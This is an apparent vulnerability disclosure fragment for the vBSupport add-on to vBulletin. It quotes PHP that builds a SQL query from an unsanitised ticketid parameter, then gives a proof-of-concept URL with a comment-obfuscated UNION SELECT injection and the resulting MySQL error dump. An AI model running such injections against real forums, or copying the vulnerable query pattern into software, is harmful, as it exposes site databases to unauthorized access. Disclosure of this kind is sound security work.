±-------------------------------------------------------------------
+
±-------------------------------------------------------------------
PoC:
Database error SQL
±-------------------------------------------------------------------
// do not limit the users access
$fromuseraccess = "";
}
// get the info about the ticket first
if ($ticket = $db->query_first("
SELECT ticket.*
" . iif($vbulletin->options['privallowicons'], ",icon.title AS icontitle, icon.iconpath") . "
FROM " . TABLE_PREFIX . "ticket as ticket
" . iif($vbulletin->options['privallowicons'], "LEFT JOIN " . TABLE_PREFIX . "icon AS icon ON(icon.iconid = ticket.iconid)") . "
WHERE ticketid=" . $vbulletin->GPC['ticketid'] . "
$fromuseraccess
"))
{
±-------------------------------------------------------------------
http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/
±-------------------------------------------------------------------
MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 5
Error Number : 1064
Date : Monday, July 2nd 2007 @ 02:54:54 PM
Script : http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/
Referrer :
IP Address : 127.0.0.1
Username : admin
Classname : vb_database
Invalid SQL:
SELECT ticket.*
,icon.title AS icontitle, icon.iconpath
FROM ticket as ticket
LEFT JOIN icon AS icon ON(icon.iconid = ticket.iconid)
WHERE ticketid=1/**/union/**/select/**/;
±-------------------------------------------------------------------
±-------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
±-------------------------------------------------------------------
±------------------------[ W D T ]----------------------------------